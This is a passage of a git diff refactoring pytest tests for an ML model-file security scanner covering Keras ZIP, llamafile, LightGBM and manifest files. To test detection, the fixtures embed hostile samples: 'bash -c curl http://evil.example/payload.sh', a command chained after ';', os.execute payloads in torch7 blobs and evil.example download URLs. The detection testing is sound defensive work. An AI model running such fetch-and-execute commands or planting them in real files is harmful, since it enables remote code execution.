module_value, ("native_child")) def test_native_function_with_string_config_is_critical(self, tmp_path: Path) -> None: """Canonical serialized functions must be checked even though their config is a string.""" @@ -6722,28 +6540,9 @@ def test_native_dangerous_module_prefix_collisions_are_not_critical( module_value: str, ) -> None: """Dangerous native roots should use exact root matching.""" - scanner = KerasZipScanner() - config = { - "class_name": "Sequential", - "config": { - "layers": [ - { - "class_name": "Lambda", - "name": "prefix_collision", - "config": {"fn_module": module_value}, - } - ] - }, - } - - result = scanner.scan(self._make_keras_zip(config, tmp_path)) + self._assert_safe_native_child(tmp_path, module_value, ("prefix_collision")) - cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-1550"] - assert cve_issues - assert all(issue.severity != IssueSeverity.CRITICAL for issue in cve_issues) - - def test_untrusted_module_custom_package(self, tmp_path: Path) -> None: - """Unknown module references in callable context should be flagged as WARNING.""" + def _assert_untrusted_keras_module(self, tmp_path: Path, module_name: str, failure_message: str) -> None: scanner = KerasZipScanner() config = { "class_name": "Sequential", @@ -6753,7 +6552,7 @@ def test_untrusted_module_custom_package(self, tmp_path: Path) -> None: "class_name": "Lambda", "name": "lambda_1", "config": { - "fn_module": "my_custom_package.layers", + "fn_module": module_name, }, } ] @@ -6762,11 +6561,16 @@ def test_untrusted_module_custom_package(self, tmp_path: Path) -> None: result = scanner.scan(self._make_keras_zip(config, tmp_path)) cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-1550"] - assert len(cve_issues) >= 1, "Should flag non-allowlisted module" + assert len(cve_issues) >= 1, failure_message assert cve_issues[0].severity == IssueSeverity.WARNING - def test_safe_keras_module_no_false_positive(self, tmp_path: Path) -> None: - """A layer referencing 'keras.layers' should NOT be flagged.""" + def test_untrusted_module_custom_package(self, tmp_path: Path) -> None: + """Unknown module references in callable context should be flagged as WARNING.""" + self._assert_untrusted_keras_module( + tmp_path, ("my_custom_package.layers"), ("Should flag non-allowlisted module") + ) + + def _assert_safe_keras_module(self, tmp_path: Path, module_name: str, failure_message: str) -> None: scanner = KerasZipScanner() config = { "class_name": "Sequential", @@ -6775,7 +6579,7 @@ def test_safe_keras_module_no_false_positive(self, tmp_path: Path) -> None: { "class_name": "Dense", "name": "dense_1", - "module": "keras.layers", + "module": module_name, "config": {"units": 10}, } ] @@ -6784,28 +6588,17 @@ def test_safe_keras_module_no_false_positive(self, tmp_path: Path) -> None: result = scanner.scan(self._make_keras_zip(config, tmp_path)) cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-1550"] - assert len(cve_issues) == 0, "Safe keras.layers module should not be flagged" + assert len(cve_issues) == 0, failure_message + + def test_safe_keras_module_no_false_positive(self, tmp_path: Path) -> None: + """A layer referencing 'keras.layers' should NOT be flagged.""" + self._assert_safe_keras_module(tmp_path, ("keras.layers"), ("Safe keras.layers module should not be flagged")) def test_safe_tensorflow_module_no_false_positive(self, tmp_path: Path) -> None: """A layer referencing 'tensorflow.keras.layers' should NOT be flagged.""" - scanner = KerasZipScanner() - config = { - "class_name": "Sequential", - "config": { - "layers": [ - { - "class_name": "Dense", - "name": "dense_1", - "module": "tensorflow.keras.layers", - "config": {"units": 10}, - } - ] - }, - } - result = scanner.scan(self._make_keras_zip(config, tmp_path)) - - cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-1550"] - assert len(cve_issues) == 0, "Safe tensorflow module should not be flagged" + self._assert_safe_keras_module( + tmp_path, ("tensorflow.keras.layers"), ("Safe tensorflow module should not be flagged") + ) def test_nested_model_module_reference(self, tmp_path: Path) -> None: """Dangerous module in nested model layer should be detected.""" @@ -6886,47 +6679,17 @@ def test_none_module_value_not_flagged(self, tmp_path: Path) -> None: def test_non_callable_layer_unknown_module_not_flagged(self, tmp_path: Path) -> None: """Unknown module on non-callable layers should not produce noisy CVE warnings.""" - scanner = KerasZipScanner() - config = { - "class_name": "Sequential", - "config": { - "layers": [ - { - "class_name": "Dense", - "name": "dense_1", - "module": "my_custom_package.layers", - "config": {"units": 10}, - } - ] - }, - } - result = scanner.scan(self._make_keras_zip(config, tmp_path)) - - cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-1550"] - assert len(cve_issues) == 0, "Non-callable layer module should not trigger CVE-2025-1550 warning" + self._assert_safe_keras_module( + tmp_path, + ("my_custom_package.layers"), + ("Non-callable layer module should not trigger CVE-2025-1550 warning"), + ) def test_prefix_collision_module_is_not_allowlisted(self, tmp_path: Path) -> None: """Module like 'mathutils.payload' should NOT be treated as safe 'math'.""" - scanner = KerasZipScanner() - config = { - "class_name": "Sequential", - "config": { - "layers": [ - { - "class_name": "Lambda", - "name": "lambda_1", - "config": { - "fn_module": "mathutils.payload", - }, - } - ] - }, - } - result = scanner.scan(self._make_keras_zip(config, tmp_path)) - - cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-1550"] - assert len(cve_issues) >= 1, "mathutils should not match safe 'math' prefix" - assert cve_issues[0].severity == IssueSeverity.WARNING + self._assert_untrusted_keras_module( + tmp_path, ("mathutils.payload"), ("mathutils should not match safe 'math' prefix") + ) class TestCVE20258747GetFileGadget: @@ -7424,13 +7187,7 @@ def test_get_file_extract_tar_in_format_list_detects_cve_2025_12060(self, tmp_pa assert [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"] - @pytest.mark.parametrize("archive_format", ["tgz", "tar.gz", "TAR", " tar "]) - def test_get_file_unsupported_archive_format_no_cve_2025_12060( - self, - tmp_path: Path, - archive_format: str, - ) -> None: - """Unsupported aliases and normalized variants fail before extraction in Keras.""" + def _assert_get_file_format_without_cve(self, tmp_path: Path, archive_format: Any) -> None: scanner = KerasZipScanner() config = { "class_name": "Sequential", @@ -7453,6 +7210,15 @@ def test_get_file_unsupported_archive_format_no_cve_2025_12060( assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"] + @pytest.mark.parametrize("archive_format", ["tgz", "tar.gz", "TAR", " tar "]) + def test_get_file_unsupported_archive_format_no_cve_2025_12060( + self, + tmp_path: Path, + archive_format: str, + ) -> None: + """Unsupported aliases and normalized variants fail before extraction in Keras.""" + self._assert_get_file_format_without_cve(tmp_path, archive_format) + @pytest.mark.parametrize("archive_format", [None, [], ["auto", "tar"]]) def test_get_file_non_tar_effective_format_no_cve_2025_12060( self, @@ -7460,27 +7226,7 @@ def test_get_file_non_tar_effective_format_no_cve_2025_12060( archive_format: Any, ) -> None: """Disabled formats and a list that errors before tar cannot reach tar extraction.""" - scanner = KerasZipScanner() - config = { - "class_name": "Sequential", - "config": { - "layers": [ - { - "class_name": "Dense", - "name": "dense_1", - "config": { - "fn": "get_file", - "origin": "https://evil.example/payload.tar.gz", - "extract": True, - "archive_format": archive_format, - }, - } - ] - }, - } - result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path)) - - assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"] + self._assert_get_file_format_without_cve(tmp_path, archive_format) @pytest.mark.parametrize(("argument", "value"), [("extract", 1), ("extract", "yes"), ("untar", 1)]) def test_get_file_truthy_extraction_arguments_detect_cve_2025_12060( @@ -8160,40 +7906,10 @@ def items(self) -> Iterator[tuple[str, Any]]: # type: ignore[override] assert "keras_zip_config_traversal_item_limit_exceeded" in result.metadata["scan_outcome_reasons"] def test_literal_overflow_does_not_hide_queued_unsafe_deserialization(self) -> None: - scanner = KerasZipScanner( - { - "max_config_traversal_items": 100, - "max_config_string_literals": 100, - "max_config_string_chars": 128, - } - ) - scanner.current_file_path = "bounded.keras" - result = ScanResult(scanner_name=scanner.name, scanner=scanner) - config = [ - "x" * 129, - {"module": "keras.config", "fn": "enable_unsafe_deserialization"}, - ] - - assert scanner._has_unsafe_deserialization_reference(config, result) is True - assert "keras_zip_config_string_char_limit_exceeded" in result.metadata["scan_outcome_reasons"] + _assert_queued_unsafe_config(("enable_unsafe_deserialization"), (True)) def test_literal_overflow_does_not_flag_unsafe_deserialization_near_match(self) -> None: - scanner = KerasZipScanner( - { - "max_config_traversal_items": 100, - "max_config_string_literals": 100, - "max_config_string_chars": 128, - } - ) - scanner.current_file_path = "bounded.keras" - result = ScanResult(scanner_name=scanner.name, scanner=scanner) - config = [ - "x" * 129, - {"module": "keras.config", "fn": "enable_unsafe_deserialization_helper"}, - ] - - assert scanner._has_unsafe_deserialization_reference(config, result) is False - assert "keras_zip_config_string_char_limit_exceeded" in result.metadata["scan_outcome_reasons"] + _assert_queued_unsafe_config(("enable_unsafe_deserialization_helper"), (False)) @pytest.mark.parametrize( ("callable_name", "expected"), @@ -8237,14 +7953,9 @@ def strip(self, chars: str | None = None, /) -> str: assert len(cve_issues[0].details["urls"][0]) <= scanner.MAX_CONFIG_SECURITY_LITERAL_CHARS def test_bounded_projection_limits_root_layer_scanning(self) -> None: - class CountingList(list[Any]): + class CountingList(_CountingList): item_iterations = 0 - def __iter__(self) -> Iterator[Any]: - for item in super().__iter__(): - type(self).item_iterations += 1 - yield item - layers = CountingList({"class_name": "Dense", "config": {}} for _ in range(100)) config = {"class_name": "Sequential", "config": {"layers": layers}} scanner = KerasZipScanner({"max_config_traversal_items": 5}) @@ -8260,14 +7971,9 @@ def __iter__(self) -> Iterator[Any]: assert "keras_zip_config_traversal_item_limit_exceeded" in result.metadata["scan_outcome_reasons"] def test_bounded_projection_limits_inbound_node_scanning(self) -> None: - class CountingList(list[Any]): + class CountingList(_CountingList): item_iterations = 0 - def __iter__(self) -> Iterator[Any]: - for item in super().__iter__(): - type(self).item_iterations += 1 - yield item - inbound_nodes = CountingList({"args": [], "kwargs": {}} for _ in range(100)) config = { "class_name": "Sequential", @@ -8294,14 +8000,9 @@ def __iter__(self) -> Iterator[Any]: assert "keras_zip_config_traversal_item_limit_exceeded" in result.metadata["scan_outcome_reasons"] def test_bounded_projection_limits_compile_config_recursion(self) -> None: - class CountingList(list[Any]): + class CountingList(_CountingList): item_iterations = 0 - def __iter__(self) -> Iterator[Any]: - for item in super().__iter__(): - type(self).item_iterations += 1 - yield item - metrics: Any = "mean_squared_error" for _ in range(100): metrics = CountingList([metrics]) @@ -9365,3 +9066,102 @@ def test_allows_known_safe_model_classes_in_zip(self, tmp_path): subclass_checks = [c for c in result.checks if "subclassed" in c.name.lower()] assert len(subclass_checks) > 0 assert all(c.status == CheckStatus.PASSED for c in subclass_checks) + + +def _fail_keras_zip_member_read( + _self: KerasZipScanner, + _archive: zipfile.ZipFile, + _member_name: str, +) -> None: + raise OSError("simulated Keras ZIP member read failure") + + +def _assert_queued_unsafe_config(config_name: str, config_value: bool) -> None: + scanner = KerasZipScanner( + { + "max_config_traversal_items": 100, + "max_config_string_literals": 100, + "max_config_string_chars": 128, + } + ) + scanner.current_file_path = "bounded.keras" + result = ScanResult(scanner_name=scanner.name, scanner=scanner) + config = [ + "x" * 129, + {"module": "keras.config", "fn": config_name}, + ] + + assert scanner._has_unsafe_deserialization_reference(config, result) is config_value + assert "keras_zip_config_string_char_limit_exceeded" in result.metadata["scan_outcome_reasons"] + + +def _assert_relative_vocabulary_cve(tmp_path: Path, vocabulary: str) -> None: + scanner = KerasZipScanner() + config = { + "class_name": "Sequential", + "config": { + "layers": [ + { + "class_name": "StringLookup", + "name": "string_lookup", + "config": {"vocabulary": vocabulary}, + }, + ], + }, + } + + model_path = create_configured_keras_zip(tmp_path, config, keras_version="3.11.3") + result = scanner.scan(str(model_path)) + + assert any( + check.details.get("cve_id") == "CVE-2025-12058" and check.status == CheckStatus.FAILED + for check in result.checks + ) + + +def _assert_safe_registered_layer( + tmp_path: Path, class_name: str, layer_name: str, registered_name: str, filename: str +) -> None: + scanner = KerasZipScanner() + config = { + "class_name": "Functional", + "config": { + "layers": [ + { + "class_name": "InputLayer", + "name": "input_1", + "config": {"batch_shape": [None, 4]}, + }, + { + "class_name": class_name, + "name": layer_name, + "module": "keras.src.ops.numpy", + "registered_name": registered_name, + "config": {}, + }, + ] + }, + } + + result = scanner.scan(str(create_configured_keras_zip(tmp_path, config, file_name=filename))) + + assert all(check.name != "Custom Layer Class Detection" for check in result.checks) + assert all(check.name != "Custom Object Detection" for check in result.checks) + + +def _assert_ambiguous_mxnet_metadata( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch, filename: str, prefix: str, suffix: str +) -> None: + monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) + keras_path = tmp_path / filename + with zipfile.ZipFile(keras_path, "w") as zf: + zf.writestr("config.json", json.dumps({"class_name": "Sequential", "config": {"layers": []}})) + zf.writestr( + "metadata.json", + prefix + ("x" * 129) + suffix, + ) + + result = KerasZipScanner().scan(str(keras_path)) + + assert result.success is False + assert any(check.name == "MXNet Symbol Routing" and check.status == CheckStatus.FAILED for check in result.checks) diff --git a/tests/scanners/test_lightgbm_scanner.py b/tests/scanners/test_lightgbm_scanner.py index 249a54c32..7075b12fd 100644 --- a/tests/scanners/test_lightgbm_scanner.py +++ b/tests/scanners/test_lightgbm_scanner.py @@ -10,9 +10,11 @@ from modelaudit.core import determine_exit_code, scan_model_directory_or_file from modelaudit.models import ModelAuditResultModel from modelaudit.scanners import get_scanner_for_file -from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, Check, CheckStatus, IssueSeverity, ScanResult +from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity, ScanResult from modelaudit.scanners.lightgbm_scanner import LightGBMScanner from modelaudit.utils.file.detection import detect_file_format, detect_format_from_extension, validate_file_type +from tests.helpers.cache import check_by_name as _check_by_name +from tests.helpers.cache import scan_without_cache as _scan_without_cache def _build_lightgbm_text(extra_lines: list[str] | None = None) -> str: @@ -40,14 +42,6 @@ def _build_lightgbm_text(extra_lines: list[str] | None = None) -> str: return "\n".join(base_lines) + "\n" -def _check_by_name(result: ScanResult, name: str) -> list[Check]: - return [check for check in result.checks if check.name == name] - - -def _scan_without_cache(path: Path) -> ModelAuditResultModel: - return scan_model_directory_or_file(str(path), cache_scan_results=False) - - def _assert_lightgbm_read_failure( direct: ScanResult, aggregate: ModelAuditResultModel, diff --git a/tests/scanners/test_llamafile_scanner.py b/tests/scanners/test_llamafile_scanner.py index bbfb275ff..a322dbc59 100644 --- a/tests/scanners/test_llamafile_scanner.py +++ b/tests/scanners/test_llamafile_scanner.py @@ -48,6 +48,25 @@ from tests.helpers import create_malicious_pickle +def _record_torch7_candidate_offsets(monkeypatch: pytest.MonkeyPatch) -> list[int]: + """Record candidate offsets while delegating to the currently installed scanner.""" + scanned_offsets: list[int] = [] + original_scan_candidate = LlamafileScanner._scan_embedded_torch7_candidate + + def counting_scan_candidate( + self: LlamafileScanner, + path: Path, + scanner: Any, + result: ScanResult, + offset: int, + ) -> tuple[ScanResult | None, int]: + scanned_offsets.append(offset) + return original_scan_candidate(self, path, scanner, result, offset) + + monkeypatch.setattr(LlamafileScanner, "_scan_embedded_torch7_candidate", counting_scan_candidate) + return scanned_offsets + + def _build_llamafile_blob( *, runtime_lines: list[str] | None = None, @@ -1565,20 +1584,7 @@ def test_llamafile_bounds_torch7_scan_attempts_after_marker_decoys( torch7_payload = b"T7\x00\x00torch.FloatTensor nn.Sequential\ncmd = os.execute('id')\n" binary.write_bytes(_build_llamafile_blob(embedded_payload=valid_gguf + decoys + torch7_payload)) - scanned_offsets: list[int] = [] - original_scan_candidate = LlamafileScanner._scan_embedded_torch7_candidate - - def counting_scan_candidate( - self: LlamafileScanner, - path: Path, - scanner: Any, - result: ScanResult, - offset: int, - ) -> tuple[ScanResult | None, int]: - scanned_offsets.append(offset) - return original_scan_candidate(self, path, scanner, result, offset) - - monkeypatch.setattr(LlamafileScanner, "_scan_embedded_torch7_candidate", counting_scan_candidate) + scanned_offsets = _record_torch7_candidate_offsets(monkeypatch) result = LlamafileScanner(config={"torch7_max_scan_bytes": 128}).scan(str(binary)) @@ -1772,20 +1778,7 @@ def test_llamafile_bounds_actionable_candidate_scans_but_keeps_higher_severity( critical_payload = b"T7\x00\x00torch.FloatTensor nn.Sequential\ncmd = os.execute('bash -c id')\n" binary.write_bytes(_build_llamafile_blob(embedded_payload=b"".join(warning_candidates) + critical_payload)) - scanned_offsets: list[int] = [] - original_scan_candidate = LlamafileScanner._scan_embedded_torch7_candidate - - def counting_scan_candidate( - self: LlamafileScanner, - path: Path, - scanner: Any, - result: ScanResult, - offset: int, - ) -> tuple[ScanResult | None, int]: - scanned_offsets.append(offset) - return original_scan_candidate(self, path, scanner, result, offset) - - monkeypatch.setattr(LlamafileScanner, "_scan_embedded_torch7_candidate", counting_scan_candidate) + scanned_offsets = _record_torch7_candidate_offsets(monkeypatch) result = LlamafileScanner(config={"llamafile_torch7_max_candidate_scans": 2, "torch7_max_scan_bytes": 128}).scan( str(binary) @@ -1853,20 +1846,7 @@ def test_llamafile_does_not_rank_unrelated_shell_string_as_critical_cap_signal( critical_payload = b"T7\x00\x00torch.FloatTensor nn.Sequential\ncmd = os.execute('bash -c id')\n" binary.write_bytes(_build_llamafile_blob(embedded_payload=b"".join(warning_candidates) + critical_payload)) - scanned_offsets: list[int] = [] - original_scan_candidate = LlamafileScanner._scan_embedded_torch7_candidate - - def counting_scan_candidate( - self: LlamafileScanner, - path: Path, - scanner: Any, - result: ScanResult, - offset: int, - ) -> tuple[ScanResult | None, int]: - scanned_offsets.append(offset) - return original_scan_candidate(self, path, scanner, result, offset) - - monkeypatch.setattr(LlamafileScanner, "_scan_embedded_torch7_candidate", counting_scan_candidate) + scanned_offsets = _record_torch7_candidate_offsets(monkeypatch) result = LlamafileScanner(config={"llamafile_torch7_max_candidate_scans": 2, "torch7_max_scan_bytes": 512}).scan( str(binary) @@ -2073,27 +2053,15 @@ def test_llamafile_ignores_many_invalid_ascii_torch7_header_decoys( torch7_payload = b"4\n1\n3\nV 1\n13\nnn.Sequential\ncmd = os.execute('id')\n" binary.write_bytes(_build_llamafile_blob(embedded_payload=invalid_ascii_decoys + torch7_payload)) - scanned_offsets: list[int] = [] structural_probes = 0 - original_scan_candidate = LlamafileScanner._scan_embedded_torch7_candidate original_structural_probe = find_structural_torch7_offset - def counting_scan_candidate( - self: LlamafileScanner, - path: Path, - scanner: Any, - result: ScanResult, - offset: int, - ) -> tuple[ScanResult | None, int]: - scanned_offsets.append(offset) - return original_scan_candidate(self, path, scanner, result, offset) - def counting_structural_probe(payload: bytes) -> int | None: nonlocal structural_probes structural_probes += 1 return original_structural_probe(payload) - monkeypatch.setattr(LlamafileScanner, "_scan_embedded_torch7_candidate", counting_scan_candidate) + scanned_offsets = _record_torch7_candidate_offsets(monkeypatch) monkeypatch.setattr( "modelaudit.scanners.llamafile_scanner.find_structural_torch7_offset", counting_structural_probe ) @@ -2778,20 +2746,7 @@ def raise_os_error(_path: Path, _offset: int, _num_bytes: int) -> bytes: def test_llamafile_scanner_flags_suspicious_runtime_strings(tmp_path: Path) -> None: - binary = tmp_path / "suspicious.llamafile" - binary.write_bytes( - _build_llamafile_blob( - runtime_lines=[ - "bash -c curl http://evil.example/payload.sh", - ] - ) - ) - - result = LlamafileScanner().scan(str(binary)) - - runtime_issues = [issue for issue in result.issues if "Executable runtime contains" in issue.message] - assert runtime_issues - assert any(issue.severity == IssueSeverity.CRITICAL for issue in runtime_issues) + _assert_llamafile_runtime_risk(tmp_path, ("suspicious.llamafile"), ("bash -c curl http://evil.example/payload.sh")) @pytest.mark.parametrize("encoding", ["utf-16le", "utf-16be"]) @@ -3461,20 +3416,7 @@ def test_llamafile_scanner_evidence_prefers_correlated_command_over_local_url(tm def test_llamafile_scanner_does_not_skip_mixed_safe_and_suspicious_runtime_string(tmp_path: Path) -> None: - binary = tmp_path / "mixed.llamafile" - binary.write_bytes( - _build_llamafile_blob( - runtime_lines=[ - "llamafile ; curl http://evil.example/payload.sh", - ] - ) - ) - - result = LlamafileScanner().scan(str(binary)) - - runtime_issues = [issue for issue in result.issues if "Executable runtime contains" in issue.message] - assert runtime_issues - assert any(issue.severity == IssueSeverity.CRITICAL for issue in runtime_issues) + _assert_llamafile_runtime_risk(tmp_path, ("mixed.llamafile"), ("llamafile ; curl http://evil.example/payload.sh")) def test_llamafile_scanner_allows_known_safe_runtime_fragments(tmp_path: Path) -> None: @@ -3528,21 +3470,12 @@ def test_llamafile_scanner_ignores_bundled_runtime_command_near_matches( def test_llamafile_scanner_flags_mixed_safe_fragment_and_command_tokens(tmp_path: Path) -> None: - binary = tmp_path / "mixed-fragment.llamafile" - binary.write_bytes( - _build_llamafile_blob( - runtime_lines=[ - "INFO llama server listening on http://127.0.0.1:8080 ; curl http://evil.example/payload.sh", - ] - ) + _assert_llamafile_runtime_risk( + tmp_path, + ("mixed-fragment.llamafile"), + ("INFO llama server listening on http://127.0.0.1:8080 ; curl http://evil.example/payload.sh"), ) - result = LlamafileScanner().scan(str(binary)) - - runtime_issues = [issue for issue in result.issues if "Executable runtime contains" in issue.message] - assert runtime_issues - assert any(issue.severity == IssueSeverity.CRITICAL for issue in runtime_issues) - @pytest.mark.parametrize( "runtime_line", @@ -3655,3 +3588,20 @@ def test_llamafile_embedded_gguf_findings_include_location_mapping(tmp_path: Pat embedded_checks = [check for check in result.checks if check.name.startswith("Llamafile Embedded")] assert embedded_checks assert any((check.location or "").startswith("llamafile:") for check in embedded_checks) + + +def _assert_llamafile_runtime_risk(tmp_path: Path, filename: str, runtime_line: str) -> None: + binary = tmp_path / filename + binary.write_bytes( + _build_llamafile_blob( + runtime_lines=[ + runtime_line, + ] + ) + ) + + result = LlamafileScanner().scan(str(binary)) + + runtime_issues = [issue for issue in result.issues if "Executable runtime contains" in issue.message] + assert runtime_issues + assert any(issue.severity == IssueSeverity.CRITICAL for issue in runtime_issues) diff --git a/tests/scanners/test_manifest_scanner.py b/tests/scanners/test_manifest_scanner.py index c5a222e59..7ae1868ce 100644 --- a/tests/scanners/test_manifest_scanner.py +++ b/tests/scanners/test_manifest_scanner.py @@ -1,6 +1,7 @@ import builtins import json import logging +from collections.abc import Callable from pathlib import Path from typing import Any @@ -15,6 +16,22 @@ from modelaudit.utils.helpers import cache_decorator +def _cloud_read_failure( + original_read: Callable[[ManifestScanner, str], str], + message: str = "simulated cloud storage URL read failure", +) -> Callable[[ManifestScanner, str], str]: + read_counts: dict[int, int] = {} + + def fail_cloud_url_read_once(self: ManifestScanner, path: str) -> str: + scanner_id = id(self) + read_counts[scanner_id] = read_counts.get(scanner_id, 0) + 1 + if read_counts[scanner_id] == 1: + raise OSError(message) + return original_read(self, path) + + return fail_cloud_url_read_once + + def _https_url(host: str, path: str = "/model.bin") -> str: """Build HTTPS URLs without embedding full host literals in test assertions.""" return f"https://{host}{path}" @@ -334,15 +351,7 @@ def test_manifest_cloud_storage_read_failure_is_inconclusive_after_parse_retry( json.dumps({"model_type": "bert", "weights": "https://bucket.s3.amazonaws.com/malware/model.bin"}), encoding="utf-8", ) - original_read = ManifestScanner._read_manifest_text - read_counts: dict[int, int] = {} - - def fail_cloud_url_read_once(self: ManifestScanner, path: str) -> str: - scanner_id = id(self) - read_counts[scanner_id] = read_counts.get(scanner_id, 0) + 1 - if read_counts[scanner_id] == 1: - raise OSError("simulated cloud storage URL read failure") - return original_read(self, path) + fail_cloud_url_read_once = _cloud_read_failure(ManifestScanner._read_manifest_text) monkeypatch.setattr(ManifestScanner, "_read_manifest_text", fail_cloud_url_read_once) @@ -379,15 +388,7 @@ def test_manifest_cloud_storage_read_failure_remains_unsuccessful_with_recovered ), encoding="utf-8", ) - original_read = ManifestScanner._read_manifest_text - read_counts: dict[int, int] = {} - - def fail_cloud_url_read_once(self: ManifestScanner, path: str) -> str: - scanner_id = id(self) - read_counts[scanner_id] = read_counts.get(scanner_id, 0) + 1 - if read_counts[scanner_id] == 1: - raise OSError("simulated cloud storage URL read failure") - return original_read(self, path) + fail_cloud_url_read_once = _cloud_read_failure(ManifestScanner._read_manifest_text) monkeypatch.setattr(ManifestScanner, "_read_manifest_text", fail_cloud_url_read_once) @@ -441,15 +442,9 @@ def test_manifest_cloud_storage_read_failure_bypasses_stale_clean_cache( cached_entries = get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] assert cached_entries > 0 - original_read = ManifestScanner._read_manifest_text - read_counts: dict[int, int] = {} - - def fail_cloud_url_read_once(self: ManifestScanner, path: str) -> str: - scanner_id = id(self) - read_counts[scanner_id] = read_counts.get(scanner_id, 0) + 1 - if read_counts[scanner_id] == 1: - raise OSError("simulated cloud storage URL read failure after cache warm") - return original_read(self, path) + fail_cloud_url_read_once = _cloud_read_failure( + ManifestScanner._read_manifest_text, "simulated cloud storage URL read failure after cache warm" + ) monkeypatch.setattr(ManifestScanner, "_read_manifest_text", fail_cloud_url_read_once) @@ -1860,56 +1855,32 @@ def test_manifest_scanner_inconclusive_parse_preserves_security_exit(tmp_path: P def test_manifest_scanner_parses_toml_manifest_for_weak_hash(tmp_path: Path) -> None: """Supported TOML manifests should receive structured weak-hash checks.""" - test_file = tmp_path / "model_config.toml" - test_file.write_text('model_type = "bert"\nchecksum = "0000000000000000000000000000000000000000"\n') - - scanner = ManifestScanner() - result = scanner.scan(str(test_file)) - - failed_hash_checks = [ - check for check in result.checks if check.name == "Weak Hash Detection" and check.status == CheckStatus.FAILED - ] - assert result.success is True - assert result.metadata["root_type"] == "dict" - assert len(failed_hash_checks) == 1 - assert failed_hash_checks[0].details["key"] == "checksum" - assert failed_hash_checks[0].details["algorithm"] == "SHA1" + _assert_manifest_weak_hash( + tmp_path, + ("model_config.toml"), + ('model_type = "bert"\nchecksum = "0000000000000000000000000000000000000000"\n'), + ("checksum"), + ) def test_manifest_scanner_parses_ini_manifest_for_weak_hash(tmp_path: Path) -> None: """Supported INI manifests should receive structured weak-hash checks.""" - test_file = tmp_path / "model_config.ini" - test_file.write_text("[model]\nmodel_type = bert\nchecksum = 0000000000000000000000000000000000000000\n") - - scanner = ManifestScanner() - result = scanner.scan(str(test_file)) - - failed_hash_checks = [ - check for check in result.checks if check.name == "Weak Hash Detection" and check.status == CheckStatus.FAILED - ] - assert result.success is True - assert result.metadata["root_type"] == "dict" - assert len(failed_hash_checks) == 1 - assert failed_hash_checks[0].details["key"] == "model.checksum" - assert failed_hash_checks[0].details["algorithm"] == "SHA1" + _assert_manifest_weak_hash( + tmp_path, + ("model_config.ini"), + ("[model]\nmodel_type = bert\nchecksum = 0000000000000000000000000000000000000000\n"), + ("model.checksum"), + ) def test_manifest_scanner_parses_config_ini_manifest_for_weak_hash(tmp_path: Path) -> None: """INI-style .config manifests should not be mistaken for JSON arrays.""" - test_file = tmp_path / "model.config" - test_file.write_text("[model]\nmodel_type = bert\nchecksum = 0000000000000000000000000000000000000000\n") - - scanner = ManifestScanner() - result = scanner.scan(str(test_file)) - - failed_hash_checks = [ - check for check in result.checks if check.name == "Weak Hash Detection" and check.status == CheckStatus.FAILED - ] - assert result.success is True - assert result.metadata["root_type"] == "dict" - assert len(failed_hash_checks) == 1 - assert failed_hash_checks[0].details["key"] == "model.checksum" - assert failed_hash_checks[0].details["algorithm"] == "SHA1" + _assert_manifest_weak_hash( + tmp_path, + ("model.config"), + ("[model]\nmodel_type = bert\nchecksum = 0000000000000000000000000000000000000000\n"), + ("model.checksum"), + ) def test_manifest_scanner_parses_config_json_array_for_weak_hash(tmp_path: Path) -> None: @@ -2069,13 +2040,7 @@ def test_manifest_scanner_timeout_preserves_weak_hash_finding_and_is_not_cached( test_file.write_text(json.dumps({"model_type": "bert", "checksum": "e3b0c44298fc1c149afbf4c8996fb924"})) cache_dir = tmp_path / "cache" - original_check_weak_hashes = ManifestScanner._check_weak_hashes - - def detect_then_expire(self: ManifestScanner, content: object, result: ScanResult) -> None: - original_check_weak_hashes(self, content, result) - self.scan_start_time = 0 - - monkeypatch.setattr(ManifestScanner, "_check_weak_hashes", detect_then_expire) + _expire_after_weak_hashes(monkeypatch) scanner = ManifestScanner(config={"timeout": 1}) result = scanner.scan(str(test_file)) @@ -2126,13 +2091,7 @@ def test_manifest_scanner_timeout_keeps_strong_hash_near_match_clean( ) -> None: test_file = tmp_path / "config.json" test_file.write_text(json.dumps({"model_type": "bert", "checksum": "0" * 64})) - original_check_weak_hashes = ManifestScanner._check_weak_hashes - - def detect_then_expire(self: ManifestScanner, content: object, result: ScanResult) -> None: - original_check_weak_hashes(self, content, result) - self.scan_start_time = 0 - - monkeypatch.setattr(ManifestScanner, "_check_weak_hashes", detect_then_expire) + _expire_after_weak_hashes(monkeypatch) result = ManifestScanner(config={"timeout": 1}).scan(str(test_file)) @@ -2260,3 +2219,30 @@ def test_manifest_scanner_expanded_exact_domains_flagged(tmp_path: Path) -> None assert "https://evil.readthedocs.io/payload" in detected_urls assert "https://evil.fastly.net/payload" in detected_urls assert "https://evil.streamlit.io/payload" in detected_urls + + +def _assert_manifest_weak_hash(tmp_path: Path, filename: str, contents: str, hash_key: str) -> None: + test_file = tmp_path / filename + test_file.write_text(contents) + + scanner = ManifestScanner() + result = scanner.scan(str(test_file)) + + failed_hash_checks = [ + check for check in result.checks if check.name == "Weak Hash Detection" and check.status == CheckStatus.FAILED + ] + assert result.success is True + assert result.metadata["root_type"] == "dict" + assert len(failed_hash_checks) == 1 + assert failed_hash_checks[0].details["key"] == hash_key + assert failed_hash_checks[0].details["algorithm"] == "SHA1" + + +def _expire_after_weak_hashes(monkeypatch: pytest.MonkeyPatch) -> None: + original_check_weak_hashes = ManifestScanner._check_weak_hashes + + def detect_then_expire(self: ManifestScanner, content: object, result: ScanResult) -> None: + original_check_weak_hashes(self, content, result) + self.scan_start_time = 0 + + monkeypatch.setattr(ManifestScanner, "_check_weak_hashes", detect_then_expire) diff --git a/tests/scanners/test_metadata_scanner.py 